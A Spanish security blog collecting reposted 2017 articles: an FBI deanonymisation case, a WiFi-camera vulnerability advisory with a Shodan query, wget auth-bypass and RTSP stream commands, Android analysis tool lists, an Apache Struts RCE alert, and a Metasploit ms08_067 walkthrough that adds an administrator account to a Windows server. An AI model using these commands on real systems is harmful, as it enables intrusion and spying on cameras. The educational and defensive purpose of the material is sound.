Suscribete a Mi Canal en YOUTUBE , da Click --> AQUÍ.

Canal acádemico donde se enseñará como atacan los ciberdelincuentes y como protegerse de estos ataques.

jueves, 23 de marzo de 2017

Tu cuenta anónima en Twitter no lo es tanto: cómo el FBI identifica a los usuarios investigándolas.

¿Has pensado alguna ocasión en tener una cuenta anónima de Twitter o tienes ya una? Algunas se han convertido en auténticas estrellas de la red social. Ya sea por publicaciones humorísticas, comentarios mordaces o GIFs graciosos, estas cuentas han conseguido mucha notoriedad.
Algunas, sin embargo, no se usan para motivos tan poco turbios. A través de una cuenta anónima, se utilizó un tuit para provocar un ataque epiléptico a un usuario. El tuit fue denunciado y la policía de Dallas investigaría el caso con asistencia del FBI, logrando obtener la identidad del agresor sin que Twitter se la facilitase, tal y como el investigador de seguridad @X0rz ha publicado en su cuenta.



La declaración jurada que recoge todo el caso se puede consultar en Document Cloud. Se trata de un informe de 14 páginas escrito por el Agente Especial del FBI Nathan P. Hopp. Al parecer, todo habría empezado cuando el denunciante y otros usuarios habrían recibido un tuit para provocarles un episodio epiléptico.
En dicho tuit se podía ver un GIF con luces estroboscópicas con la leyenda "espero que te de un ataque por tu post". El responsable de este tuit era un tal Ari Goldstein, que tenía el nombre de usuario @jew_goldstein. Aparentemente, tras esta cuenta anónima se escondía John Rayne Rivello. ¿Cómo consiguieron descubrirlo?

Los hechos que desencadenaron la investigación

Todos sabemos que Twitter pide cierta información básica al usuario cuando se crea una cuenta: el nombre completo del usuario, una dirección de correo electrónico, una dirección física, fecha de nacimiento, lugar de residencia... muchos de estos datos son opcionales, y pueden dejarse en blanco si así se desea.
Por otra parte, Twitter guarda registros de las direcciones IP de cada usuario. En estos registros se puede encontrar información sobre cuándo se accedió a la plataforma, la dirección IP asociada al usuario y la fecha y la hora en la que usó su cuenta por última vez.
Teniendo todo esto en cuenta, en el documento podemos leer que Rivello creó a @jew_goldstein el 11 de diciembre de 2016. Cuatro días más tarde, el denunciante entraba a su cuenta de Twitter desde su oficina en Dallas, viendo el tuit de la cuenta anónima y sufriendo un ataque casi instantáneo. La mujer de esta persona lo asistió durante el ataque, y sacó una foto al GIF que se veía en la pantalla.



Esa foto se remitió en primer lugar al Departamento de Policía de Dallas, que a su vez envió una orden de registro a Twitter, que devolvió los siguientes resultados:
C7bo7jnx4aegqsg
Al mismo tiempo, el registro reveló que @jew_goldstein había estado hablando por mensaje directo con otros usuarios de la plataforma. En dichos mensajes había dicho que la víctima merecía "que unos emús le picotearan el hígado", que sabía que era epiléptica y que esperaba provocarle un ataque. En una de las comunicaciones privadas, colocó el GIF estroboscópico con la leyenda "le he mandado esto, a ver si se muere".

Así se desenmascaró a John Rayne Rivello

En los datos que Twitter había devuelto como consecuencia de la orden de búsqueda, se encontraba un número de teléfono de la operadora AT&T. Cuando se pidió a la operadora información sobre el número, resultó que se trataba de un número de prepago que no estaba registrado a nombre de nadie.
Sin embargo, a través de los registros de la empresa se pudo saber que el teléfono asociado a ese número era un iPhone 6, que necesitan de una Apple ID para poder ser utilizados. Estas identificaciones se pueden crear a través de las páginas de iTunes y de iCloud.
Con estos datos en la mano, la policía de Dallas pudo emitir una orden de registro a Apple para obtener más información sobre la cuenta de iCloud asociada al número de teléfono de Rivello. Esto fue lo que consiguieron:
C7bplcgxqaasrsn
Por ahora ya habían conseguido relacionar al servicio, el terminal y la persona, pero no sería hasta que se comenzase a revisar la cuenta que no se encontrarían, entre otras cosas, imágenes personales de Rivello y pruebas que lo conectaban a la cuenta anónima agresora. Entre ellas, el GIF que había provocado el ataque epiléptico al denunciante.
Además de todo esto, se encontró una captura de pantalla dela página de WikiPedia de la víctima, editada para establecer su muerte un día después del episodio. También muchos de los tuits del agredido habían sido capturados y guardados en la cuenta de iCloud de Rivello.
Por lo que se recoge en el informe, el agresor podrá ser juzgado dado que las autoridades han determinado que hubo intención por su parte de hacer daño y causar lesiones severas a la víctima.

Conclusiones sobre este caso

Para este investigador de ciberseguridad, la primera conclusión es muy evidente: si te ocultas para hacer algo malo, no uses algo que sea fácilmente reconocible para ello. Como por ejemplo, un iPhone 6. Según se recoge en la política de privacidad de Apple, la empresa puede suministrar la siguiente información a las fuerzas de seguridad si se lo solicitan:
  • Información del usuario.
  • Registros de correo electrónico.
  • Contenido del correo electrónico.
  • Otros contenidos de iCloud (Photo Stream, contactos, calendario...).
En resumidas cuentas, dado que pueden obtener prácticamente todo, no es la mejor manera de intentar seguir siendo anónimo a la hora de meterse en según qué asuntos. Al parecer, John Rayne Rivello era un ciudadano cualquiera intentando obtener alguna clase de venganza personal, pero el tiro le salió por la culata.
La identidad de la víctima no se menciona en ningún momento, pero llama bastante la atención que tenga una entrada propia en Wikipedia. De esto deducimos que se trata de una personalidad importante, si bien no tenemos forma de saber a qué ámbito pertenece.
Teniendo en cuenta cómo está el clima político en Estados Unidos actualmente, es fácil especular con que esta agresión esté motivada por asuntos ideológicos. Por lo demás, no se puede aventurar nada.




 __________________________________________________
Tomado de: https://www.genbeta.com/a-fondo/tu-cuenta-anonima-en-twitter-no-es-tan-anonima-como-el-fbi-identifica-a-los-usuarios-sin-ayuda-del-servicio
Se Respetan Derechos de Autor.

sábado, 18 de marzo de 2017

185000 cámaras WiFi vulnerables podrían reclutarse en botnets.

Según un aviso lanzado por Pierre Kim desde el observatorio Full Disclosure, más de 185k cámaras WiFi son actualmente vulnerables, pudiendo ser reclutadas para botnets o hackeadas con otros propósitos. Un regalo llovido del cielo para los cibercriminales.
El caso es que no hablamos de una o dos, sino de un conjunto de vulnerabilidades como el que sigue:
  • Backdoor o puerta trasera
  • Clave RSA y Certificados
  • Revelación de credenciales pre-autentificación en servidor http GoAhead
  • Remote Code Execution como root
  • RCE como root pre-autentificación
  • Varios: streaming no autorizado / Cloud (botnet)


185000 cámaras WiFi vulnerables

Localizar estas cámaras wireless es muy sencillo mediante un motor como Shodan.io. Por ejemplo, mediante la siguiente solicitud enviada por Pierre Kim, podemos localizar a día de hoy más de 200000:
https://www.shodan.io/search?query=GoAhead+5ccc069c403ebaf9f0171e9517f40e41

Estas vulnerabilidades podría usarse para realizar actividades ilegales desde nuestra infraestructura, como por ejemplo controlar nuestro dispositivo desde una gigantesca botnet.
Especialmente grave resulta una vulnerabilidad presente en estas cámaras desde el año 2015. Se trata de un script CGI en ejecución para configurar el servicio FTP, afectado por un fallo que permite ejecución remota de código.



Problemas de autentificación

Para localizar estos archivos .cgi, un atacante tiene que autentificarse:
user@kali$ wget -qO- ‘http://192.168.1.107/get_params.cgi?loginuse=BAD_LOGIN&loginpas=BAD_PASS’
var result=”Auth Failed”;
user@kali$ wget -qO- ‘http://192.168.1.107/get_params.cgi?loginuse&loginpas’
var result=”Auth Failed”;
Según comenta el experto, el acceso a los ficheros .ini no es correctamente comprobado y esto permite a cualquier atacante “saltarse” el proceso de identificación, proporcionando para ello valores loginuse y loginpas en el URI (Uniform Resource Identifier).
Un atacante podría aprovechar estas vulnerabilidades para ejecutar comandos como usuario root, así como usar un servidor Telnet sin autenticación.
También ha descubierto Kim que una carpeta del sistema (/system/www/pem/ck.pem) incluye un certificado de desarrollo de Apple con una clave RSA privada y credenciales para el servidor web, siendo accesible a un atacante mediante los enlaces simbólicos system.ini y system-b.ini.
Las cámaras conectadas por WiFi se ejecutan en un servidor con protocolo RTSP (no autentificado) y esto quiere decir que podríamos ver el puerto TCP 10554 de la cámara y las trazas IP que transmite en tiempo real. En su análisis (con prueba de concepto incluída) se explica así:
Un atacante podría usar el servidor RTSP no-autenticado ejecutándose en la cámara, en el puerto 10554/tcp para visualizar el streaming sin identificación.
Ejemplos:
user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_1
user@kali$ vlc rstp://192.168.1.107:10554/tcp/av0_0
El último agujero de seguridad llega a través de la característica cloud implementada en el firmware y que está activada por defecto. presentando conexiones pre-establecidas con AWS, AliBaba y Baidu (si, son cámaras chinas, como tantas otras).
Stream en tiempo real vulnerable
Para poder acceder a la nube, el atacante necesitará un smartphone con una aplicación como P2PWificam o Netcam360, proporcionando el número de serie incluido en el dispositivo atacado.



____________________________________________________
Tomado de: https://protegermipc.net/2017/03/14/camaras-wifi-vulnerables-botnets/
Se Respetan Derechos de Autor

martes, 14 de marzo de 2017

Herramientas para analizar APK´s (app Android).


APK son las siglas de Android Aplication Package. Este tipo de archivo contiene el programa o aplicación que queremos instalar de la misma manera que también el instalador. Por tanto diremos que se trata de un archivo instalable concebido para Android.

Para analizar una aplicación, lo primero es conseguir el archivo .APK (Android) o .IPA (iOS). Para descargar el .APK de la PlayStore se puede utilizar el servicio de APKPure. Solo se debe pasar la URL oficial de la PlayStore. Esta herramienta no hace ningún cambio a la aplicación descargada por lo que hasta la fecha es un servicio confiable.

Este repositorio GIT tiene un listado actualizado de herramientas para analizar aplicaciones de Android (APK), al igual que Android Arsenal.

Online Tools

  • Mobile Security Framework (MobSF): Es LA herramienta, la que recomiendo abiertamente para el análisis dinámico y estático de apps, independiente de la plataforma (Android o iOS), si vas a realizar el análisis de aplicaciones móviles habitualmente esta herramienta no puede faltar en tu arsenal.
  • Quick Android Review Kit o QARK: Es un framework de análisis automatizado de aplicaciones android que tiene poco tiempo de vida, esta enfocado al análisis de aplicaciones android y cuenta con muy buenas funcionalidades.
  • SandDroid (informe de ejemplo): Es una de las mejores herramientas online que podemos tener para el análisis automático de aplicaciones android, realiza análisis dinámico y estático, además de darnos un puntaje de riesgo basado en la información que logra recolectar.
  • Reverse.it (informe de ejemplo): Es una herramienta que también permite el análisis dinámico y estático de aplicaciones android de forma automatizada, es una especialmente útil cuando buscamos comportamientos anómalos dentro de las aplicaciones móviles.
  • Dexter: Para un análisis más detallado podemos usar (previo registro gratuito) esta herramienta, enfocada en el análisis de software que nos permite de forma colaborativa visualizar el funcionamiento de la aplicación con un potente buscador que nos ayudará a encontrar fácilmente funciones interesantes en las cuales centrar nuestra atención.
  • JavaDecompilers: Es una herramienta online que nos permite decompilar aplicaciones online abriendo la posibilidad de examinar su código fuente desde un simple navegador, si con Dexter encontraste funciones interesantes que analizar, con javadecompilers puedes examinar sus entrañas para ver su funcionamiento a nivel de código.

Análisis Estático

Análisis Dinamico

  • Android DBI frameowork
  • Androl4b- A Virtual Machine For Assessing Android applications, Reverse Engineering and Malware Analysis
  • Android Malware Analysis Toolkit: (linux distro) Earlier it use to be an online analyzer
  • Mobile-Security-Framework MobSF: Mobile Security Framework is an intelligent, all-in-one open source mobile application (Android/iOS) automated pen-testing framework capable of performing static, dynamic analysis and web API testing.
  • AppUse – custom build for pentesting
  • Cobradroid – custom image for malware analysis
  • ViaLab Community Edition
  • Droidbox
  • Mercury
  • Drozer
  • Xposed: equivalent of doing Stub based code injection but without any modifications to the binary
  • Inspeckage: Android Package Inspector: dynamic analysis with api hooks, start unexported activities and more. (Xposed Module)
  • Android Hooker: Dynamic Java code instrumentation (requires the Substrate Framework)
  • ProbeDroid: Dynamic Java code instrumentation
  • Android Tamer: Virtual / Live Platform for Android Security Professionals
  • DECAF: Dynamic Executable Code Analysis Framework based on QEMU (DroidScope is now an extension to DECAF)
  • CuckooDroid: Android extension for Cuckoo sandbox
  • Mem: Memory analysis of Android (root required)
  • Crowdroid: unable to find the actual tool
  • AuditdAndroid: android port of auditd, not under active development anymore
  • Android Security Evaluation Framework: not under active development anymore
  • Android Reverse Engineering: ARE (android reverse engineering) not under active development anymore
  • Aurasium: Practical security policy enforcement for Android apps via bytecode rewriting and in-place reference monitor.
  • Android Linux Kernel modules
  • Appie: Appie is a software package that has been pre-configured to function as an Android Pentesting Environment.It is completely portable and can be carried on USB stick or smartphone.This is a one stop answer for all the tools needed in Android Application Security Assessment and an awesome alternative to existing virtual machines.
  • StaDynA: a system supporting security app analysis in the presence of dynamic code update features (dynamic class loading and reflection). This tool combines static and dynamic analysis of Android applications in order to reveal the hidden/updated behavior and extend static analysis results with this information.
  • DroidAnalytics: incomplete
  • Vezir Project: Virtual Machine for Mobile Application Pentesting and Mobile Malware Analysis
  • MARA: Mobile Application Reverse engineering and Analysis Framework
  • NowSecure Lab Automated: Enterprise tool for mobile app security testing both Android and iOS mobile apps. Lab Automated features dynamic and static analysis on real devices in the cloud to return results in minutes.
  • Taintdroid: requires AOSP compilation



Tools

  • AFLogical: Android forensics tool developed by viaForensics
  • Amandroid: Is a static analysis framework for Android apps
  • Android backup extractor: Android backup extractor
  • Android Loadable Kernel Modules
  • Android SDK
  • Android4me: J2ME port of Google's Android
  • Android-forensics: Open source Android Forensics app and framework
  • Android-random: Collection of extended examples for Android developers
  • Androwarn: Is a tool whose main aim is to detect and warn the user about potential malicious behaviours developped by an Android application
  • ApkAnalyser: Static, virtual analysis tool
  • Apk-extractor: Android Application (.apk) file extractor and Parser for Android Binary XML
  • Apkinspector: Powerful GUI tool for analysts to analyze the Android applications
  • Apk-recovery: Recover main resources from your .apk file
  • Audit tools
  • bunq fuzzer: Program for testing a mobile app by sending it semi-random inputs
  • Canhazaxs: A tool for enumerating the access to entries in the file system of an Android device
  • ConDroid: Symbolic/concolic execution of Android apps
  • DDMS: Dalvik Debug Monitor Server
  • Decaf-platform: DECAF Binary Analysis Platform
  • Device Monitor: Graphical user interface for several Android application debugging and analysis tools
  • Dexinfo: A very rudimentary Android DEX file parser
  • Dexter: Static android application analysis tool
  • Dexterity: Dex manipulation library
  • Dextools: Miscellaenous DEX (Dalvik Executable) tools
  • DidFail: Uses static analysis to detect potential leaks of sensitive information within a set of Android apps
  • Drozer: Comprehensive security audit and attack framework for Android
  • FindBugs: Find Bugs in Java Programs
  • Find Security Bugs: The FindBugs plugin for security audits of Java web applications.
  • FlowDroid: Is a context-, flow-, field-, object-sensitive and lifecycle-aware static taint analysis tool for Android applications
  • Heimdall: Cross-platform open-source tool suite used to flash firmware (aka ROMs) onto Samsung mobile devices
  • Hidex: Demo application where a method named thisishidden() in class MrHyde is hidden from disassemblers but no called by the app
  • Hooker: Automated Dynamic Analysis of Android Applications
  • Maldrolyzer: Simple framework to extract "actionable" data from Android malware (C&Cs, phone numbers etc.)
  • mbfuzzer (Mobile Application Fuzzer via SSL MITM): Mobile Application Fuzzer via SSL MITM
  • PScout: Analyzing the Android Permission Specification
  • Scalpel: A surgical debugging tool to uncover the layers under your app
  • SPARTA: Is building a toolset to verify the security of mobile phone applications
  • Apk Sign: Sign.jar automatically signs an apk with the Android test certificate.
  • SIIS Tools: This page contains a list of software tools created by the SIIS lab
  • Smali: An assembler/disassembler for Android's dex format
  • Smali-CFGs: Smali Control Flow Graph's
  • SmaliEx: A wrapper to get dex from oat
  • SmaliSCA: Static Code Analysis for Smali files
  • Soot: Java Optimization Framework
  • STAMP: STatic Analysis of Mobile Programs
  • Systrace: Analyze the performance capturing and displaying execution times of your applications and other Android system processes
  • TaintDroid: Tracking how apps use sensitive information required
  • Traceview: Graphical viewer for execution logs saved by your application
  • Undx: Bytecode translator
  • XML-apk-parser: Print AndroidManifest.xml directly from apk file


Análisis de Vulnerabilidades

  • AndroBugs Framework: Is an efficient Android vulnerability scanner that helps developers or hackers find potential security vulnerabilities in Android applications. No need to install on Windows.
  • Devknox: Autocorrect security issues as you write code
  • JAADAS: Joint Advanced Defect assEsment for android applications
  • Nogotofail
  • QARK: Quick Android Review Kit - This tool is designed to look for several security related Android application vulnerabilities, either in source code or packaged APKs.
  • Quixxi: Free automated vulnerability test.
  • SUPER Android Analyzer: Secure, Unified, Powerful and Extensible Rust Android Analyzer

Crawlers

Fuzzing

Unpackers / Deobfuscators

  • Android Unpacker: Android Unpacker presented at Defcon 22 - Android Hacker Protection Level 0
  • Dehoser: Unpacker for the HoseDex2Jar APK Protection which packs the original file inside the dex header
  • Kisskiss: Unpacker for various Android packers/protectors
  • Simplify: Generic Android Deobfuscator
  • ClassNameDeobfuscator: Simple script to parse through the .smali files produced by apktool and extract the .source annotation lines.

Packers / Obfuscators

  • Allatori
  • APKfuscator: A generic DEX file obfuscator and munger
  • APKProtect
  • Bangcle
  • DexGuard: Optimizer and obfuscator for Android
  • HoseDex2Jar: Adds some instructions to the classes.dex file that Dex2Jar can not process
  • ProGuard: Shrinks, optimizes, and obfuscates the code by removing unused code and renaming classes, fields, and methods with semantically obscure names

Reverse Engineering

Network

Toolkits

Frameworks

Sandboxes



___________________________________________________________________
Tomado de: http://blog.segu-info.com.ar/2017/03/herramientas-para-analizar-apk-app.html#herramientas-para-analizar-apk-app
Se Respetan Derechos de Autor. 

jueves, 9 de marzo de 2017

Exploit RCE para Apache Struts (Actualiza YA!)

Ayer de madrugada unos de los feeds chinos hizo saltar las alarmas llevando toda la atención a un PoC/Exploit In-the-Wild para la vulnerabilidad CVE-2017-5638 que permite RCE (ejecución remota de comandos) en las últimas versiones de Apache Struts. La vulnerabilidad afecta a Struts 2.3.5 a Struts 2.3.31 y Struts 2.5 a Struts 2.5.10.



Un script liberado por Nike Zheng (célebre y habitual hostigador de Struts), primero en páginas como Freebuf o Bobao, se aprovecha de un fallo en la función de upload del parser de Jakarta y muestra cómo modificar la cabecera Content-Header para inyectar comandos de sistema operativo cuando se llama a un action.
Si se ejecuta contra una aplicación vulnerable el resultado será la ejecución remota de comandos con el usuario que ejecuta el servidor.
Así de sencillo:


Cualquier búsqueda en Google con un dork "filetype:action" arroja unos 35 millones de resultados, de los cuales un alto porcentaje es vulnerable... el volumen y la criticidad de los servicios afectados es simplemente ... dramático.

El exploit ya ha saltado a las grandes páginas de 'advisories' y ya se han observado intentos de explotación masivos en Internet, incluso bastante sofisticados con el objetivo de conseguir persistencia o modificaciones como las que nos trae nuestro compi Sebastian Cornejo (curiositysec) que permite obtener el path de la aplicación, paso previo a la subida de una shell al servidor.

Recomendación

La criticidad es máxima y la noticia corre como la pólvora y urge tomar contramedidas.
  • Actualizar a Apache Struts (2.3.32 / 2.5.10.1 o posteriores)
  • Actualizar firmas del IDS/IPS. Por ej. Snort ya incluye reglas en server-apache.rules: SERVER-APACHE Apache Struts remote code execution attempt (SIDs: 41818, 41819)




_________________________________________________________________
Tomado de: http://blog.segu-info.com.ar/2017/03/exploit-rce-para-apache-struts.html#exploit-rce-para-apache-struts
Se respetan Derechos de Autor

lunes, 6 de marzo de 2017

Apoderarse de un Servidor con S.O. Windows Server en forma Remota con Metasploit.

Este video se hace para efectos netamente académicos. No me hago responsable por el mal uso de los conocimientos aprendidos.

Las contramedidas para que esto no se realice por parte del cyberatacante de una forma tan facil es desabilitar el acceso remoto. Desde panel de control--- Sistema---acceso remoto y desmarcar todas las opciones. Aunque existen metodos para evitar esto, que se veran en futuros videos.

La mejor defensa es tener sistemas operativos modernos, actualizados en sus parches de seguridad, un firewall bien configurado e igualmente un ids/ips.



https://youtu.be/jvRL1NfQCrQ




Resumen de lo realizado:


*****Ejecutamos metasploit desde el icono del mismo o por consola *****con el comando:
msfconsole
****Ponemos en uso el exploit
use exploit/windows/smb/ms08_067_netapi

**** Configuramos la ip a atacar
set RHOST 192.168.1.11

****Ponemos en uso el payload a inyectar
set payload windows/adduser

****Configuramos nuevas variables
**** Variable para el nuevo usuario
set USER miusuario

****Variable para el password del mismo
set PASS Mipassword1
**** Ojo, se deben cumplir políticas... Minimo 1 Mayuscula 1 ****Minuscula 1 Numero y Minimo 8 caracteres
**** Seleccionar el grupo al que va a pertenecer el usuario
set CUSTOM Administradores

**** Permitir gestionar el grupo administradores al que va a
**** pertenecer
set WMIC true

****Lanzar el exploit
exploit

**** Conectarnos en remoto en una instancia completamente
**** independiente, transparente para el atacante.
*** Importante: hacerlo desde la misma consola metasploit.
rdesktop ip_host_remoto

domingo, 5 de marzo de 2017

Herramientas para el descubrimiento de subdominios.

Todos los frameworks y metodologías existentes para tests de intrusión contemplan en sus fases iniciales el reconocimiento, y dentro del reconocimiento es fundamental el descubrimiento de subdominios ya que puede ayudar a un atacante o auditor a identificar y enumerar distintos sitios web del objetivo, algunos incluso mal configurados y vulnerables. A continuación se listan una serie de recursos online y herramientas de gran valor que facilitan enormemente esta tarea.

 

Herramientas en línea

1. Censys (https://censys.io/)

Es probablemente uno de los primeros motores de búsqueda que buscan subdominios. Además te muestra otra información como puertos abiertos, detalles del certificado y SSL y resultados del Whois.

2. Shodan (http://shodan.io/)

Shodan es una plataforma de spidering con una base de datos enorme dirigida fundamentalmente a profesionales de seguridad. Tiene datos históricos y actuales sobre una gran franja de servidores en Internet, incluyendo subdominios descubiertos, versionado de servidores y mucho más.

3. Pentest-tools (https://pentest-tools.com/information-gathering/find-subdomains-of-domain)

Dentro de la categoría de 'Information Gathering', Pentest-tools tiene una herramienta de búsqueda de subdominios que utiliza distintos métodos como transferencias de zona DNS, enumeración DNS basada en listas y peticiones a distintos motores de búsqueda.

4. DNSDumpster (https://dnsdumpster.com/)

DNSDumpster del proyecto HackerTarget.com es una herramienta que, además de los subdominuios, nos devolverá información del servidor DNS, registros MX, registros TXT y un interesante esquema de las relaciones del dominio analizado.

5. Netcraft (http://searchdns.netcraft.com/)

La compañía inglesa tiene una muy buena base de datos de dominios que no podemos olvidar consultar.

6. CloudPiercer (https://cloudpiercer.org/)

Cloudpiercer está orientado a encontrar IPs reales de servidores web que deberían estar protegidos por la infraestructura de un proveedor en la nube. Si acreditas que eres el dueño del sitio mediante alguno de los métodos disponibles, CloudPiercer realizará un escaneo verificando varios vectores como bases de datos de historial de IPs, registros DNS, ficheros sensibles, pingback, certificados y, por supuesto, subdominios.




Herramientas locales

1. Sublist3r (https://github.com/aboul3la/Sublist3r)

Es una herramienta en python capaz de enumerar subdominios de sitios web a través de varios recursos OSINT. Utiliza como motores de búsqueda Google, Yahoo, Bing, Baidu y Ask y obtiene subdominios mediante Netcraft, Virustotal, ThreatCrowd, DNSdumpster y PassiveDNS. También incorpora otra herramienta, subbrute (https://github.com/TheRook/subbrute) para encontrar más subdominios mediante fuerza bruta (wordlists).

2. SubBrute (https://github.com/TheRook/subbrute)

SubBrute es una de las herramientas de enumeración de subdominios más populares y precisas. Es un proyecto impulsado por la comunidad y utiliza "open resolvers" como proxy para no enviar directamente tráfico a los servidores DNS.

3. Knock (https://github.com/guelfoweb/knock)

Es otra herramienta escrita en Python para descubrir subdominios usando una lista de palabras. Esta diseñada para escanear los DNS en busca de transferencias de zona y para intentar evadir el registro DNS Wildcard (si está activado).

4. DNSRecon (https://github.com/darkoperator/dnsrecon)

DNSRecon de Darkoperator se incluye en el arsenal de Kali Linux y comprueba todos los registros NS en busca de transferencias de zona, registros DNs, resolución wildcard, registros PTR, etc.

5. Scripts nmap
nmap --script http-robtex-reverse-ip 8.8.8.8
nmap -p443 --script hostmap-ip2hosts oracle.com

6. iptodomain (https://github.com/jevalenciap/iptodomain)

Otra herramienta escrita en python. Permite extraer los dominios de un rango de ips usando la información histórica de la base de datos de Virustotal (requiere una API key).

7. dnsscan (https://github.com/rbsec/dnscan)

La enésima herramienta en python primero intenta transferencias de zona y, a continuación si falla, busca los registros TXT y MX y luego realiza un escaneo recursivo de subdominios mediante wordlists.

8. Recon-ng (https://bitbucket.org/LaNMaSteR53/recon-ng)

Recon-ng es un completo framework de reconocimiento web que incluye el módulo brute_hosts para obtener subdominios por fuerza bruta.

9. Fierce (https://github.com/mschwager/fierce)

Fierce es un escáner de enumeración escrito en Perl que ayuda a los pentesters a localizar el espacio de IPs y nombres de hosts no contiguos para dominios específicos mediante DNS, Whois y ARIN. Está diseñado específicamente para localizar objetivos probables dentro y fuera de una red corporativa. Dado que utiliza DNS principalmente, a menudo encuentra redes mal configuradas que generan fugas de espacio de direcciones internas.

10. dnsenum (https://github.com/fwaeytens/dnsenum)

Script en perl multiproceso para enumerar información de DNS de un dominio y para descubrir bloques de ip no contiguos.

11. Altdns (https://github.com/infosec-au/altdns)

Altdns es una herramienta de reconocimiento de DNS que permite el descubrimiento de subdominios que se ajustan a ciertos patrones. Altdns toma palabras que podrían estar presentes en subdominios bajo un dominio (como prueba, dev, stager), así como una lista de subdominios conocida o manual.

12. TheHarvester (https://github.com/laramies/theHarvester)

TheHarvester es una herramienta para obtener información sobre direcciones de email, nombres de subdominio, virtual hosts, puertos abiertos/banners y nombres de empleados desde diferentes fuentes públicas (motores de búsqueda, servidores de claves de PGP).

Es una herramienta en Python muy sencilla pero a la vez muy útil para las primeras fases de un test de intrusión o simplemente conocer la visibilidad de una compañía en Internet.




Diccionarios

Fuentes:


_______________________________________________________
Tomado de: http://blog.segu-info.com.ar/2017/03/herramientas-para-el-descubrimiento-de.html#herramientas-para-el-descubrimiento-de 
Se Respetan Derechos de Autor.